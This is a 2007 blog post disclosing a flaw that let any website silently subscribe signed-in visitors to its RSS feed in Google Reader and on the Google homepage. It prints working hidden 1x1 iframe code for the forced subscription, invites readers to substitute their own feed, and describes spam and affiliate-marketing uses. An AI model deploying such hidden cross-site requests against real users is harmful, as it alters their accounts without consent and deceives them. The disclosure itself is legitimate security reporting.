Google security flaw allows sites to auto-subscribe new RSS readers

  • 0
  • July 18, 2007
Patrick Altoft

Patrick Altoft

Director of Strategy

Have you ever opened up your Google Reader account or personalized Google Hompage and spotted a feed that you didn’t remember subscribing to? If you have then it might have been due to a security issue with the way Google handles RSS subscription requests.

Clicking on the subscribe using Google button on most blogs takes you to a page saying “Google offers two different ways to keep up-to-date with your favorite sites” with the option to click on either “Add to Google homepage” or “Add to Google Reader”.

You can see it in action by clicking on the button below (don’t worry, this won’t auto-subscribe you to anything):

 

The problem is that unscrupulous websites can copy the links to Add to Google homepage or Add to Google Reader and open them up in an IFRAME for every visitor, meaning that anybody who visits their website while signed in to a Google account will suddenly have subscribed to the RSS feed on both Google Reader and the Google homepage automatically.

All a site needs to do is add the following code to their pages, replacing the blogstorm feed with their own feed, and they get a bunch of new readers.


<iframe width="1" height="1" border="0" scrolling="0"

src=”http://www.google.com/ig/setp?et=GCZWwdGf&
source=ign_&url=http://

www.google.com/ig&n_25=url%3Dhttp://
feeds.feedburner.com/blogstorm%26val%3D3″></iframe>

<iframe width=”1″ height=”1″ border=”0″ scrolling=”0″

src=”http://www.google.com/ig/addtoreader?et=
4x_zc136&source=ign_&feedurl=

http://feeds.feedburner.com/blogstorm&
feedtitle=BlogStorm&url=http://www.google

.com/ig/add%3Ffeedurl%3Dhttp://feeds.feed
burner.com/blogstorm”></iframe>

It is worth noting that none of the other RSS readers I tested had this vulnerability.

Demo

If you want to see the security issue in action, and are signed into your Google account, click this link. Please be aware that this will auto subscribe you to the BlogStorm RSS feed so if you don’t want to know about internet marketing and general web design related topics you might want to be careful.

Why would somebody want to do this?

Now most of you are saying “Why would a blogger want to get readers in this way?”

Well, there are two answers. The first is simple: blogs like to show off a large number of Feedburner subscribers so if you have no morals, a low quality blog and want lots of subscribers, this is the way to get them.

The second is a bit more sneaky. Imagine you are doing some affiliate marketing, what is the most valuable piece of real estate on the web? Where would huge corporations pay millions per day to get an advert? The answer is right below the search box on the Google homepage.

With this exploit thousands of people could suddenly see your best offers plastered right underneath the Google search box that they use hundreds of times per week. Some people will just assume Google put them there, many will trust Google’s recommendation and buy the products.

I wonder how long this will take to get fixed?

Free of charge. Unsubscribe anytime.

--> -->